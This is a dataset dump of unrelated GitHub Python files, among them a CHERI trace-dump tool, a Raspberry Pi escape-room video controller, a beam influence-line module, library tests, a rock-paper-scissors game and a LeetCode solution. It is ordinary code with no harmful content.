Option(action=\"store_true\", help=\"Print trace info and exit\")\n    start = Option(\"-s\", type=int, default=0, help=\"Start offset in the trace\")\n    end = Option(\"-e\", type=int, default=None, help=\"Stop offset in the trace\")\n    outfile = Option(\n        \"-o\",\n        type=str,\n        default=None,\n        help=\"Write output to the given file\")\n    show_regs = Option(\"-r\", action=\"store_true\", help=\"Dump register content\")\n    instr = Option(default=None, help=\"Find instruction occurrences\")\n    reg = Option(\n        default=None,\n        help=\"Show the instructions that use the given register\")\n    pc = Option(\n        type=option_range_validator,\n        default=None,\n        help=\"Find instructions with PC in given range. \" + range_format_help)\n    mem = Option(\n        type=option_range_validator,\n        default=None,\n        help=\"Show the instructions that use the given memory address. \" +\n        range_format_help)\n    exception = Option(\n        default=None,\n        help=\"Show the instructions that raise a given exception. \"\n        \"Accept the exception number in [0-30] or 'any'.\")\n    syscall = Option(\n        default=None,\n        type=int,\n        help=\"Show the syscalls with given code\")\n    nop = Option(\n        type=any_int_validator,\n        default=None,\n        help=\"Show canonical nops with given code\")\n    perms = Option(\n        type=any_int_validator,\n        default=None,\n        help=\"Find instructions that touch capabilities\"\n        \" with the given permission bits set\")\n    after = Option(\n        \"-A\",\n        type=int,\n        default=0,\n        help=\"Dump n instructions after a matching one\")\n    before = Option(\n        \"-B\",\n        type=int,\n        default=0,\n        help=\"Dump n instructions before a matching one\")\n    match_any = Option(\n        action=\"store_true\",\n        help=\"Return a trace entry when it matches any of the conditions \"\n        \"instead of all\")\n\n    def __init__(self, **kwargs):\n        \"\"\"\n        This parser filters the trace according to a set of match\n        conditions. 
Multiple match conditions can be used at the same time\n to refine or widen the filter.\n\n :param sym_reader: symbol reader helper, used to extract\n symbol information\n \"\"\"\n sym_reader = kwargs.pop(\"sym_reader\")\n assert \"trace_path\" in kwargs, \"trace_path argument is required!\"\n if \"keyframe_file\" not in kwargs:\n kwargs[\"keyframe_file\"] = \"{}.kf\".format(kwargs[\"trace_path\"])\n super().__init__(**kwargs)\n\n if not self.is_worker:\n # update kwargs used to create workers\n self.kwargs[\"sym_reader\"] = sym_reader\n\n self._entry_history = deque([], self.config.before)\n \"\"\"FIFO instructions that may be shown if a match is found\"\"\"\n\n self._dump_next = 0\n \"\"\"The remaining number of instructions to dump after a match\"\"\"\n\n self._kernel_mode = False\n \"\"\"Keep track of kernel-userspace transitions\"\"\"\n\n self.sym_reader = sym_reader\n \"\"\"Helper used to search symbols for addresses\"\"\"\n\n self.filters = [\n self._match_instr,\n self._match_pc,\n self._match_addr,\n self._match_reg,\n self._match_exception,\n self._match_nop,\n self._match_syscall,\n self._match_perm\n ]\n\n self.out = sys.stdout\n \"\"\"Output file stream\"\"\"\n\n if self.config.outfile:\n self.out = tempfile.NamedTemporaryFile(mode=\"w\")\n\n self.update_config(self.config)\n\n def update_config(self, config):\n self._entry_history = deque([], config.before)\n self._dump_next = 0\n self._kernel_mode = False\n\n def repr_register(self, entry):\n if (entry.gpr_number() != -1):\n return \"$%d\" % entry.gpr_number()\n elif (entry.capreg_number() != -1):\n return \"$c%d\" % entry.capreg_number()\n\n def dump_cap(self, cap):\n chericap = CheriCap(cap)\n return str(chericap)\n\n def dump_regs(self, entry, regs, last_regs):\n for idx in range(0,31):\n real_regnum = idx + 1\n self.out.write(\"[%d] $%d = %x\\n\" % (\n regs.valid_gprs[idx],\n real_regnum,\n regs.gpr[idx]))\n for idx in range(0,32):\n self.out.write(\"[%d] $c%d = %s\\n\" % (\n regs.valid_caps[idx], idx,\n self.dump_cap(regs.cap_reg[idx])))\n\n def dump_instr(self, inst, entry, idx):\n # self.out.write(str(inst))\n if entry.exception != 31:\n exception = \"except:%x\" % entry.exception\n else:\n # no exception\n exception = \"\"\n instr_dump = \"{%d:%d} 0x%x %s %s\" % (\n entry.asid, entry.cycles, entry.pc, inst.inst.name, exception)\n sym = None\n # XXX it would be nice to have an inst.is_branch property\n # it should be provided by LLVM quite easily\n if inst.opcode == \"cjalr\":\n sym_addr = inst.op1.value.base + inst.op1.value.offset\n sym = self.sym_reader.find_symbol(sym_addr)\n elif inst.opcode == \"cjr\":\n sym_addr = inst.op0.value.base + inst.op0.value.offset\n sym = self.sym_reader.find_symbol(sym_addr)\n elif inst.opcode == \"jalr\" or inst.opcode == \"jr\":\n sym_addr = inst.op0.value\n sym = self.sym_reader.find_symbol(sym_addr)\n if sym:\n instr_dump = \"%s (%s)\" % (instr_dump, sym)\n self.out.write(instr_dump)\n self.out.write(\"\\n\")\n # dump read/write\n if inst.cd is None:\n # no operands for the instruction\n return\n\n if entry.is_load or entry.is_store:\n sym = self.sym_reader.find_symbol(entry.memory_address)\n if sym:\n loc = \"[%x (%s)]\" % (entry.memory_address, sym)\n else:\n loc = \"[%x]\" % entry.memory_address\n if entry.is_load:\n self.out.write(\"$%s = %s\\n\" % (inst.cd.name, loc))\n else:\n self.out.write(\"%s = $%s\\n\" % (loc, inst.cd.name))\n\n if inst.op0.is_register:\n if (inst.op0.gpr_index != -1):\n gpr_value = inst.op0.value\n gpr_name = inst.op0.name\n if gpr_value is not 
None:\n                    self.out.write(\"$%s = %x\\n\" % (gpr_name, gpr_value))\n                else:\n                    self.out.write(\"$%s = Unknown\\n\" % gpr_name)\n            elif (inst.op0.cap_index != -1 or inst.op0.caphw_index != -1):\n                cap_name = inst.op0.name\n                cap_value = inst.op0.value\n                if cap_value is not None:\n                    self.out.write(\"$%s = %s\\n\" % (\n                        cap_name, self.dump_cap(cap_value)))\n                else:\n                    self.out.write(\"$%s = Unknown\\n\" % cap_name)\n\n    def dump_kernel_user_switch(self, entry):\n        if self._kernel_mode != entry.is_kernel():\n            if entry.is_kernel():\n                self.out.write(\"Enter kernel mode {%d:%d}\\n\" % (\n                    entry.asid, entry.cycles))\n            else:\n                self.out.write(\"Enter user mode {%d:%d}\\n\" % (\n                    entry.asid, entry.cycles))\n            self._kernel_mode = entry.is_kernel()\n\n    def do_dump(self, inst, entry, regs, last_regs, idx):\n        # dump instr\n        self.dump_instr(inst, entry, idx)\n        if self.config.show_regs:\n            self.dump_regs(entry, regs, last_regs)\n\n    def _update_match_result(self, match, value):\n        \"\"\"\n        Combine the current match result with the value of\n        a test according to the match mode\n        \"\"\"\n        if value is None:\n            return match\n        if self.config.match_any:\n            return match or value\n        else:\n            return match and value\n\n    def _check_limits(self, start, end, value):\n        result = True\n        if start != None and start > value:\n            result = False\n        if end != None and end < value:\n            result = False\n        return result\n\n    def _match_instr(self, inst, regs):\n        \"\"\"Check if the current instruction matches\"\"\"\n        if self.config.instr:\n            return self.config.instr == inst.opcode\n        return None\n\n    def _match_pc(self, inst, regs):\n        \"\"\"Check if the current instruction PC matches\"\"\"\n        if self.config.pc:\n            start, end = self.config.pc\n            return self._check_limits(start, end, inst.entry.pc)\n        return None\n\n    def _match_addr(self, inst, regs):\n        \"\"\"Check if the current load or store address matches\"\"\"\n        if self.config.mem:\n            if inst.entry.is_load or inst.entry.is_store:\n                start, end = self.config.mem\n                return self._check_limits(start, end, inst.entry.memory_address)\n            else:\n                return False\n        return None\n\n    def _match_reg(self, inst, regs):\n        \"\"\"Check if the current instruction uses a register\"\"\"\n        if self.config.reg:\n            for operand in inst.operands:\n                if not operand.is_register:\n                    continue\n                if operand.name == self.config.reg:\n                    return True\n            return False\n        return None\n\n    def _match_exception(self, inst, regs):\n        \"\"\"Check if an exception occurred while executing an instruction\"\"\"\n        if self.config.exception:\n            if inst.entry.exception == 31:\n                # no exception\n                return False\n            elif self.config.exception == \"any\":\n                return True\n            else:\n                return inst.entry.exception == int(self.config.exception)\n        return None\n\n    def _match_syscall(self, inst, regs):\n        \"\"\"Check if this instruction is a syscall with given code\"\"\"\n        # system call code is in v0\n        code_reg = 2\n        if self.config.syscall:\n            if inst.opcode == \"syscall\" and inst.entry.exception == 8:\n                if (regs.valid_gprs[code_reg] and\n                    regs.gpr[code_reg] == self.config.syscall):\n                    return True\n            return False\n        return None\n\n    def _match_perm(self, inst, regs):\n        \"\"\"Check if this instruction uses capabilities with the given perms\"\"\"\n        if self.config.perms:\n            for operand in inst.operands:\n                if (not operand.is_capability or\n                    operand.value is None):\n                    # if not a capability or the register in the register set\n                    # is not valid\n                    continue\n                cap_reg = CheriCap(operand.value)\n                if cap_reg.has_perm(self.config.perms):\n                    return True\n            return False\n        return None\n\n    def _match_nop(self, inst, regs):\n        
\"\"\"Check if instruction is a given canonical NOP\"\"\"\n        if self.config.nop:\n            if inst.opcode == \"lui\":\n                return (inst.op0.gpr_index == 0 and\n                        inst.op1.value == self.config.nop)\n            return False\n        return None\n\n    def scan_all(self, inst, entry, regs, last_regs, idx):\n        if self._dump_next > 0:\n            self.dump_kernel_user_switch(entry)\n            self._dump_next -= 1\n            self.do_dump(inst, entry, regs, last_regs, idx)\n        else:\n            # initial match value, if match_any is true\n            # we OR the match results so start with false\n            # else we AND them, so start with true\n            match = not self.config.match_any\n            for checker in self.filters:\n                result = checker(inst, regs)\n                match = self._update_match_result(match, result)\n            if match:\n                self.dump_kernel_user_switch(entry)\n                # dump all the instructions in the queue\n                while len(self._entry_history) > 0:\n                    old_inst, idx = self._entry_history.popleft()\n                    self.do_dump(old_inst, old_inst.entry, old_inst._regset,\n                                 old_inst._prev_regset, idx)\n                try:\n                    self.do_dump(inst, entry, regs, last_regs, idx)\n                except Exception as e:\n                    logger.error(\"Can not dump instruction %s: %s\",\n                                 inst, e)\n                    return True\n                self._dump_next = self.config.after\n            else:\n                self._entry_history.append((inst, idx))\n        return False\n\n    def parse(self, start=None, end=None, direction=0):\n        start = start or self.config.start\n        end = end or self.config.end\n        if self.config.info:\n            self.out.write(\"Trace size: %s\\n\" % len(self))\n        else:\n            super().parse(start, end)\n\n    def mp_result(self):\n        \"\"\"Return the temporary file.\"\"\"\n        self.out.flush()\n        return self.out.name\n\n    def mp_merge(self, results):\n        \"\"\"Concatenate temporary files\"\"\"\n        if self.config.outfile:\n            with open(self.config.outfile, 'wb') as out:\n                for in_file in results:\n                    with open(in_file,'rb') as fd:\n                        shutil.copyfileobj(fd, out, 1024*1024*50)\n\n\n@interactive_tool(key=\"scan\")\nclass PytracedumpDriver(BaseTraceTaskDriver):\n\n    description = \"\"\"Dump CHERI binary trace.\n    Each instruction entry has the following format:\n    {<asid>:<cycle>} <pc> <instruction> <exception>\n\n    Memory accesses show the referenced address in the line below:\n    $<register> = [<address>] or [<address>] = $<register>\n\n    Capabilities are displayed in the following format:\n    [b:<base> o:<offset> l:<length> p:<perms> t:<otype> v:<valid> s:<sealed>]\n    t_alloc and t_free are only relevant in the provenance graph.\n\n    When dumping the register set, the format of each entry is the following:\n    [<valid>] $<register> = <value>\"\"\"\n\n    scan = NestedConfig(TraceDumpParser)\n    symbols_path = Option(\n        nargs=\"*\",\n        help=\"Path where to look for binaries in the vmmap, \"\n        \"default is current directory.\",\n        default=[\".\"])\n    vmmap = NestedConfig(VMMapFileParser)\n    threads = Option(\n        type=int,\n        default=1,\n        help=\"Run the tool with the given number of workers\")\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n        self.vmmap = VMMapFileParser(config=self.config.vmmap)\n        self.vmmap.parse()\n        self.symbols = SymReader(vmmap=self.vmmap,\n                                 path=self.config.symbols_path)\n        self.parser = TraceDumpParser(trace_path=self.config.trace,\n                                      sym_reader=self.symbols,\n                                      config=self.config.scan,\n                                      threads=self.config.threads)\n\n    def update_config(self, config):\n        super().update_config(config)\n        self.parser.update_config(config.scan)\n\n    def run(self):\n        self.parser.parse(self.config.scan.start, self.config.scan.end)\n","repo_name":"CTSRD-CHERI/cheriplot","sub_path":"cheriplot/dbg/tracedump.py","file_name":"tracedump.py","file_ext":"py","file_size_in_byte":15919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16733377728","text":"import RPi.GPIO as GPIO\nimport 
time\nfrom omxplayer.player import OMXPlayer\n\nflag = 0\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(25, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(8, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(7, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(1, GPIO.OUT)\nGPIO.output(1, GPIO.LOW)\n\nplayer = OMXPlayer('/video/30sec.mp4')\ntime.sleep(0.5)\n\nwhile GPIO.input(7)==0:\n if player.position()>5: player.set_position(0)\n\nwhile True:\n if GPIO.input(25)==1:\n print(\"GPIO 25 1\")\n if player.position()<5:\n player.play()\n print(\"play\")\n else:\n print(\"pause\")\n player.pause()\n while GPIO.input(25)==1:\n print(\"GPIO 25 1 wait 8 and 7\")\n time.sleep(0.5)\n if GPIO.input(25)==1 and GPIO.input(8)==1 and GPIO.input(7)==1:\n if player.position()>10.0:\n player.pause()\n flag = 1\n GPIO.output(1, GPIO.HIGH)\n else:\n player.play()\n elif GPIO.input(25)==0:\n print(\"GPIO 25 0\")\n if flag == 1:\n while True:\n GPIO.output(1, GPIO.HIGH)\n if GPIO.input(25)==0:\n print(\"RESTART! RESTART! RESTART!\")\n player.set_position(0)\n player.play()\n time.sleep(0.5)\n player.pause()\n","repo_name":"monstror/dracula-escape-","sub_path":"картина 1 нажатия/vid.py","file_name":"vid.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14859679636","text":"#First we'll import the os module\n# This will allow us to create file paths across operating systems\nimport os\n\n# Module for reading CSV files\nimport csv\n\ncsvpath = os.path.join('Resources', 'Budget_data.csv')\ntotalmonths=0\ntotalvalue=0\nCurrent=0\nPrevious=0\nTotalchanges=0\nListfordifferences=[]\nnum= input(\"how many numbers:\")\nwith open(csvpath) as csvfile:\n\n # CSV reader specifies delimiter and variable that holds contents\n csvreader = csv.reader(csvfile, delimiter=',')\n\n \n\n # Read the header row first (skip this step if there is now header)\n csv_header = next(csvreader)\n print(f\"CSV Header: {csv_header}\")\n\n # Read each row of data after the header\n for row in csvreader:\n \n totalmonths=totalmonths+1\n totalvalue=totalvalue+int(row[1])\n Current=int(row[1])\n Change= Current-Previous\n if Previous==0:\n Previous=Current\n elif Previous!=int(Current):\n Change= Current-Previous \n Previous=Current\n Listfordifferences.append(Change)\n if totalmonths>1:\n Totalchanges= Totalchanges+Change\nAveragechange= Totalchanges/(totalmonths-1) \nCurrent=0\nPrevious=0\nfor amount in Listfordifferences:\n Current=amount\n if Previous==0:\n Previous=Current\n\n elif Current>Previous:\n greatestincrease=Current\n Previous=Current\n elif Current Email.id\")\n ]\n\n person_json = {\"id\": 5, \"name\": \"Jill\", \"email_id\": 4}\n email_json = {\"id\": 4, \"address\": \"jill@hill.org\"}\n\n e = Email.load(email_json)\n p = Person.load(person_json)\n\n assert p.email == e\n\ndef test_load_many(mybase):\n\n @add_schema\n class Email(mybase):\n items = []\n FIELDS = [\"id\", \"address\"]\n RELATIONSHIPS = [\n One(\"person\", \"find Email.person_id <> Person.id\")\n ]\n\n email_json = [\n {\"id\": 4, \"address\": \"jill@hill.org\"},\n {\"id\": 5, \"address\": \"jill2@hill.org\"},\n {\"id\": 6, \"address\": \"jill3@hill.org\"}\n ]\n\n emails = Email.load(email_json)\n assert len(emails) == len(email_json)\n\ndef test_additional_fields(mybase):\n\n @add_schema\n class Email(mybase):\n items = []\n FIELDS = [\"id\", \"address\"]\n RELATIONSHIPS = [\n One(\"person\", \"find Email.person_id <> Person.id\")\n ]\n\n email_json = {\"id\": 4, 
\"address\": \"jill@hill.org\", \"additional_field\": 6}\n\n email = Email.load(email_json)\n print(email.additional_field)\n\n\n # assert p.description == person_data[\"description\"]","repo_name":"jvrana/Pillowtalk","sub_path":"tests/test_basics/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73524230248","text":"\"\"\"\nPyCBA - Continuous Beam Analysis - Influence Lines Module\n\"\"\"\nfrom typing import Optional, Union\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom .analysis import BeamAnalysis\n\n\nclass InfluenceLines:\n \"\"\"\n Creates influence lines for an arbitrary beam configuration using CBA\n \"\"\"\n\n def __init__(\n self,\n L: np.ndarray,\n EI: Union[float, np.ndarray],\n R: np.ndarray,\n eletype: Optional[np.ndarray] = None,\n ):\n \"\"\"\n Constructs an influence line object for a beam\n\n Parameters\n ----------\n L : np.ndarray\n A vector of span lengths.\n EI : Union[float, np.ndarray]\n A vector of member flexural rigidities.\n R : np.ndarray\n A vector describing the support conditions at each member end.\n eletype : Optional[np.ndarray]\n A vector of the member types. Defaults to a fixed-fixed element.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.ba = BeamAnalysis(L=L, EI=EI, R=R, eletype=eletype)\n self.L = self.ba.beam.length\n self.vResults = []\n self.pos = []\n\n def create_ils(self, step: Optional[float] = None, load_val: float = 1.0):\n \"\"\"\n Creates the influence lines by marching the unit load (`load_val`) across\n the defined beam configuration in `step` distance increments, storing the\n static analysis results in a vector of :class:`pycba.results.BeamResults`.\n\n Parameters\n ----------\n step : Optional[float]\n The distance increment to move the unit load; defaults to beam length / 100.\n load_val : float, optional\n The nominal value of the \"unit load\". The default is 1.0.\n\n Raises\n ------\n ValueError\n If a static beam analysis does not succeed, usually due to a beam\n configuration error.\n\n Returns\n -------\n None.\n \"\"\"\n self.vResults = [] # reset\n\n if step is None:\n step = self.L / 100\n\n npts = round(self.L / step) + 1\n\n for i in range(npts):\n # load position\n pos = i * step\n self.pos.append(pos)\n # locate load on span\n ispan, pos_in_span = self.ba.beam.get_local_span_coords(pos)\n if ispan == -1:\n load_val = 0.0\n # assemble and set load matrix\n self.ba.set_loads([[ispan + 1, 2, load_val, pos_in_span, 0]])\n # analyze\n out = self.ba.analyze()\n if out != 0:\n raise ValueError(\"IL analysis did not succeed\")\n return\n self.vResults.append(self.ba.beam_results)\n\n def get_il(self, poi: float, load_effect: str) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the influence line at a point of interest for a load effect.\n\n Parameters\n ----------\n poi : float\n The position of interest in global coordinates along the length of the\n beam.\n load_effect : str\n A single character to identify the load effect of interest, currently\n one of:\n\n - **V**: shear force\n - **M**: bending moment\n - **R**: vertical reaction at a fully restrained support\n\n The vertical reaction nearest the `poi` is used. 
For moment reactions\n use a poi at or just beside the support.\n\n Returns\n -------\n (x,eta) : tuple(np.ndarray,np.ndarray)\n A tuple of the vectors of abcissa and influence ordinates.\n \"\"\"\n if not self.vResults:\n self.create_ils()\n\n x = self.vResults[0].results.x\n dx = x[2] - x[1]\n idx = np.where(np.abs(x - poi) <= dx * 1e-6)[0][0]\n # find the nearest support to the poi\n idxr = (\n np.abs(np.cumsum(np.insert(self.ba.beam.mbr_lengths, 0, 0)) - poi)\n ).argmin()\n npts = len(self.vResults)\n eta = np.zeros(npts)\n\n for i, res in enumerate(self.vResults):\n if load_effect == \"V\":\n eta[i] = res.results.V[idx]\n elif load_effect == \"R\":\n eta[i] = res.R[idxr]\n else:\n eta[i] = res.results.M[idx]\n\n return (np.array(self.pos), eta)\n\n def plot_il(self, poi: float, load_effect: str, ax: Optional[plt.Axes] = None):\n \"\"\"\n Retrieves and plots the IL on either a supplied or new axes.\n\n Parameters\n ----------\n poi : float\n The position of interest in global coordinates along the length of the\n beam.\n load_effect : str\n A single character to identify the load effect of interest, currently\n one of:\n\n - **V**: shear force\n - **M**: bending moment\n - **R**: vertical reaction at a fully restrained support\n\n The vertical reaction nearest the `poi` is used. For moment reactions\n use a poi at or just beside the support.\n ax : Optional[plt.Axes]\n A user-supplied matplotlib Axes object; when None (default), one is\n created for the plot.\n \"\"\"\n\n (x, y) = self.get_il(poi, load_effect)\n\n if ax is None:\n fig, ax = plt.subplots()\n\n ax.plot([0, self.L], [0, 0], \"k\", lw=2)\n ax.plot(x, y, \"r\")\n ax.grid()\n ax.set_ylabel(\"Influence Ordinate\")\n ax.set_xlabel(\"Distance along beam (m)\")\n ax.set_title(f\"IL for {load_effect} at {poi}\")\n plt.tight_layout()\n","repo_name":"ccaprani/pycba","sub_path":"src/pycba/inf_lines.py","file_name":"inf_lines.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"53"} +{"seq_id":"9880048477","text":"# one_off_type_start\n\nfrom dagster import DagsterType, check_dagster_type\n\nset_containing_1 = DagsterType(\n name=\"set_containing_1\",\n description=\"A set containing the value 1. May contain any other values.\",\n type_check_fn=lambda _context, obj: isinstance(obj, set) and 1 in obj,\n)\n\nassert check_dagster_type(set_containing_1, {1, 2}).success # => True\n\n# one_off_type_end\n\n# type_factory_start\n\n\ndef set_has_element_type_factory(x):\n return DagsterType(\n name=f\"set_containing_{x}\",\n description=f\"A set containing the value {x}. 
May contain any other values.\",\n type_check_fn=lambda _context, obj: isinstance(obj, set) and x in obj,\n )\n\n\nset_containing_2 = set_has_element_type_factory(2)\nassert check_dagster_type(set_containing_2, {1, 2}).success # => True\n\n# type_factory_end\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/guides/dagster/dagster_type_factories/simple_example.py","file_name":"simple_example.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"41522349052","text":"# Main program to keep a grid certification up to date.\nfrom ruciopylib.cert import cert\nfrom retry import retry\nimport os\nimport shutil\nimport logging\n\n\ndef copy_if_exists(source, dest):\n 'Copy a file if it exists'\n if os.path.exists(source):\n shutil.copyfile(source, dest)\n\n\n@retry(delay=5 * 60)\ndef setup_certs():\n '''Locate a cert and copy it over, and get it ready for use.\n We just hang if we can't find certs to use.\n '''\n globus_directory = os.path.expanduser('~/.globus')\n if not os.path.exists(globus_directory):\n logging.info(f'Creating the {globus_directory} directory')\n os.mkdir(globus_directory)\n\n # First, see if they exist in certs\n copy_if_exists('/certs/userkey.pem', f'{globus_directory}/userkey.pem')\n copy_if_exists('/certs/usercert.pem', f'{globus_directory}/usercert.pem')\n\n # Next, in the globus area, make sure the permissions are right.\n os.chmod(f'{globus_directory}/userkey.pem', 0o400)\n os.chmod(f'{globus_directory}/usercert.pem', 0o444)\n\n\ndef do_cert():\n logging.info('Setting up certs for use')\n setup_certs()\n logging.info(\"Starting registration loop\")\n c = cert()\n c.run_registration_loop(log_func=lambda l: logging.info(l))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n do_cert()\n","repo_name":"gordonwatts/func-adl-rucio","sub_path":"tools/cert_manager.py","file_name":"cert_manager.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36092441477","text":"#!/usr/bin/env python3\n\nimport random\n\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players,\nand reports both Player's scores each round.\"\"\"\n\n\"\"\"The Player class is the parent class for all of the Players\nin this game\"\"\"\n\n\nclass Player:\n\n def __init__(self):\n self.my_move = None\n self.their_move = None\n\n def learn(self, my_move, their_move):\n pass\n\n\nclass AllRockPlayer(Player):\n\n def __init__(self):\n self.name = \"Rock Player\"\n\n def get_choice(self):\n return 'rock'\n\n\nclass RandomPlayer(Player):\n\n def __init__(self):\n self.name = \"Random Player\"\n self.p1 = random.choice([\"rock\", \"paper\", \"scissors\"])\n self.p2 = random.choice([\"rock\", \"paper\", \"scissors\"])\n\n def get_choice(self):\n return self.p1\n\n def moveplay(self):\n return self.p2\n\n\nclass HumanPlayer(Player):\n\n def __init__(self):\n self.choices = [\"rock\", \"paper\", \"scissors\"]\n\n def player_choice(self):\n print(\"Enter your choice: (rock, paper, scissors)\")\n my_choice = input().lower()\n if my_choice not in self.choices:\n print(\"Invalid choice. 
\\n\\\n Please choose from rock, paper, or scissors.\")\n return self.player_choice()\n return my_choice\n\n\nclass ReflectPlayer(Player):\n\n def __init__(self):\n self.name = \"Reflect Player\"\n self.my_move = None\n self.their_move = None\n\n def get_choice(self):\n if self.their_move is not None:\n return self.their_move\n else:\n return random.choice([\"rock\", \"paper\", \"scissors\"])\n\n def learn(self, my_move, their_move):\n self.my_move = my_move\n self.their_move = their_move\n\n\nclass CyclePlayer(Player):\n\n def __init__(self):\n self.name = \"Cycle Player\"\n self.my_move = None\n self.their_move = None\n self.playchoice = [\"rock\", \"paper\", \"scissors\"]\n self.currentmove = 0\n\n def get_choice(self):\n if self.their_move is not None:\n self.currentmove = (self.currentmove + 1) % len(self.playchoice)\n return self.playchoice[self.currentmove]\n else:\n return random.choice(self.playchoice)\n\n def learn(self, my_move, their_move):\n self.my_move = my_move\n self.their_move = their_move\n\n\nclass Game:\n\n def __init__(self):\n self.choices = [\"rock\", \"paper\", \"scissors\"]\n self.player_score = 0\n self.computer_score = 0\n self.computer2_score = 0\n self.round = 0\n self.opponent = random.choice([\n AllRockPlayer(),\n RandomPlayer(),\n ReflectPlayer(),\n CyclePlayer()\n ])\n\n def get_player_choice(self):\n return HumanPlayer().player_choice()\n\n def get_computer_choice(self):\n return RandomPlayer().get_choice()\n\n def get_computer2_choice(self):\n return RandomPlayer().moveplay()\n\n def determine_winner_pc(self, player_choice, computer_choice):\n if player_choice == computer_choice:\n return \"It's a tie!\"\n elif (player_choice == \"rock\" and computer_choice == \"scissors\") or \\\n (player_choice == \"paper\" and computer_choice == \"rock\") or \\\n (player_choice == \"scissors\" and computer_choice == \"paper\"):\n self.player_score += 1\n return \"You win!\"\n else:\n self.computer_score += 1\n return \"Computer wins!\"\n\n def play_pc(self):\n self.round += 1\n player_choice = self.get_player_choice()\n computer_choice = self.opponent.get_choice()\n self.opponent.learn(computer_choice, player_choice)\n print(f\"You are playing against {self.opponent.name}\")\n print(f\"Round {self.round}\")\n print(f\"You chose {player_choice}.\\n\\\nComputer chose {computer_choice}.\")\n result = self.determine_winner_pc(player_choice, computer_choice)\n print(result)\n print(f\"Player: {self.player_score}\\n\\\nComputer: {self.computer_score}\")\n\n play_again = input(\"Play again?\\n\\\nReply 'yes' to continue or reply with anything else to quit : \").lower()\n if play_again == \"yes\":\n game.play_pc()\n else:\n if self.player_score > self.computer_score:\n print(f\"Your score is {self.player_score},\\n\\\nThe computer score is {self.computer_score}.\\n\\\nYou won this game!!!\")\n elif self.player_score < self.computer_score:\n print(f\"Your score is {self.player_score},\\n\\\nThe computer score is {self.computer_score}.\\n\\\nThe Computer won this game!!!\")\n else:\n print(f\"Your score is {self.player_score},\\n\\\nThe computer score is {self.computer_score}.\\n\\\nThis game is a tie!!!\")\n print(\"Thanks for playing!\")\n\n def determine_winner_cc(self, computer_choice, computer2_choice):\n if computer_choice == computer2_choice:\n return \"It's a tie!\"\n elif (computer_choice == \"rock\" and computer2_choice == \"scissors\") \\\n or (computer_choice == \"paper\" and computer2_choice == \"rock\") \\\n or (computer_choice == \"scissors\" and\n 
computer2_choice == \"paper\"):\n self.computer_score += 1\n return \"Player 1 wins!\"\n else:\n self.computer2_score += 1\n return \"Player 2 wins!\"\n\n def play_cc(self):\n self.round += 1\n computer_choice = self.get_computer_choice()\n computer2_choice = self.get_computer2_choice()\n print(f\"Round {self.round}\")\n print(f\"Player 1 chose {computer_choice}.\\n\\\nPlayer 2 chose {computer2_choice}.\")\n result = self.determine_winner_cc(computer_choice,\n computer2_choice)\n print(result)\n print(f\"Player 1: {self.computer_score}\\n\\\nPlayer 2: {self.computer2_score}\")\n\n play_again = input(\"Play again?\\n\\\nReply 'yes' to continue or reply with anything else to quit : \").lower()\n if play_again == \"yes\":\n game.play_cc()\n else:\n if self.computer2_score > self.computer_score:\n print(f\"Player 1 score is {self.computer_score},\\n\\\nPlayer 2 score is {self.computer2_score}.\\n\\\nPlayer 2 won this game!!!\")\n elif self.computer2_score < self.computer_score:\n print(f\"Player 1 score is {self.computer_score},\\n\\\nPlayer 2 score is {self.computer2_score}.\\n\\\nPlayer 1 won this game!!!\")\n else:\n print(f\"Player 1 score is {self.computer_score},\\n\\\nPlayer 2 score is {self.computer2_score}.\\n\\\nThis game is a tie!!!\")\n print(\"Thanks for playing!\")\n\n def start(self):\n gameselect = int(input())\n if gameselect == 0:\n game.play_cc()\n elif gameselect == 1:\n game.play_pc()\n else:\n print(\"Invalid selection. Please try again\")\n self.start()\n\n\nif __name__ == \"__main__\":\n game = Game()\n print(\"How many players? (Enter 0 or 1)\")\n game.start()\n\n","repo_name":"Zymoclassic/tutorials","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14986023600","text":"from typing import List\nimport collections\n\n\nclass Solution:\n def calcEquation(self, eq: List[List[str]], val: List[float], qu: List[List[str]]) -> List[float]:\n m=collections.defaultdict(dict)\n for (x,y),v in zip(eq,val):\n m[x][y]=v\n m[y][x]=1/v\n \n def bfs(st,dt):\n if not( st in m and dt in m): return -1.0\n q,seen=[(st,1.0)],set()\n for x,v in q:\n if x==dt:\n return v\n seen.add(x)\n for y in m[x]:\n if y not in seen:\n q.append((y,(v*m[x][y])))\n return -1.0\n return [bfs(s,d) for s,d in qu]","repo_name":"Anushree1291/Leetcode-solutions","sub_path":"0399-evaluate-division/0399-evaluate-division.py","file_name":"0399-evaluate-division.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
